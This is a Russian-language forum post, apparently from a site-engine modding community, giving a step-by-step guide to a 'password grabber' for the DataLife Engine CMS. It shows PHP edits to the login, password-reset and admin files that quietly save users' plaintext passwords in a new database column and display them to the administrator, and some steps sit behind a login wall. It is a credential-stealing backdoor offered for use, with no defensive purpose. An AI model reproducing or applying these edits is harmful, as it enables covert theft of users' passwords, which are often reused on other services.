- Регистрация
- 17 Ноя 2008
- Сообщения
- 523
- Реакции
- 481
- Автор темы
- Заблокирован
- #1
Создаем грабер паролей...
Сейчас расскажу в этой статье вам как за 10 минут сделать грабер паролей..
Что нужно:
Колонка в мускуле и изменения кода файлов...
Добавляем колонку в таблицу с юзерами, назовем ее passer(а так как хотите, только потом в запросах замените)...
Теперь нужно рассмотреть 3 ситуации:
Регистрация.
Вход.
Востановления пароля
Админка
1) регистрация.
открываем engine/modules/register.php
ищем
регистрацию сделали...
2) востановление пароля
открываем engine/modules/lostpassword.php
ищем:
заменяем на
готово, сохраняем...
3)вход на сайт
открываем engine/modules/sitelogin.php
ищем
ДО ЭТОГО вставляем
ниже в 2 местах ищем
заменяем на
по смыслу все...
4)админка
теперь добавляем вывод пароля при просмотре профиля в админке...
открываем engine/inc/editusers.php
ищем
ниже вставляем:
или, чтобы просмотр был возможен только пользователю с id=1
Идея взята с Password Base 4.0
Сделал: MATRIX
p.s. идея модуля не продается...
Некоторое взял под хайд 3, кто нибудь да поймет причину
Исправлена ошибка в работе с базой
Сейчас расскажу в этой статье вам как за 10 минут сделать грабер паролей..
Что нужно:
Колонка в мускуле и изменения кода файлов...
Добавляем колонку в таблицу с юзерами, назовем ее passer(а так как хотите, только потом в запросах замените)...
Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.
Теперь нужно рассмотреть 3 ситуации:
Регистрация.
Вход.
Востановления пароля
Админка
1) регистрация.
открываем engine/modules/register.php
ищем
Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.
ниже вставляем
Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.
ищем запрос в базу (в конце..)
Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.
вставляем колонку passer
Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.
готово, сохраняем...регистрацию сделали...
2) востановление пароля
открываем engine/modules/lostpassword.php
ищем:
Код:
$db->query( "UPDATE " . USERPREFIX . "_users set password='" . md5( md5( $new_pass ) ) . "', allowed_ip = '' WHERE user_id='$douser'" );
Код:
$db->query( "UPDATE " . USERPREFIX . "_users set password='" . md5( md5( $new_pass ) ) . "', passer='".$new_pass."', allowed_ip = '' WHERE user_id='$douser'" );3)вход на сайт
открываем engine/modules/sitelogin.php
ищем
Код:
$_POST['login_password'] = md5( $_POST['login_password'] );
Код:
$passer = $_POST['login_password'];
Код:
lastdate='{$_TIME}', logged_ip='" . $_IP . "'
Код:
lastdate='{$_TIME}', logged_ip='" . $_IP . "', passer='".$passer."'4)админка
теперь добавляем вывод пароля при просмотре профиля в админке...
открываем engine/inc/editusers.php
ищем
Код:
<tr>
<td style="padding:4px;">{$lang['user_newpass']}</td>
<td colspan="2"><input size="20" name="editpass" class="edit"></td>
</tr>
Код:
<tr>
<td style="padding:4px;">Пароль:</td>
<td colspan="2">{$row['passer']}</td>
</tr>
Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.
Идея взята с Password Base 4.0
Сделал: MATRIX
p.s. идея модуля не продается...
Некоторое взял под хайд 3, кто нибудь да поймет причину
Исправлена ошибка в работе с базой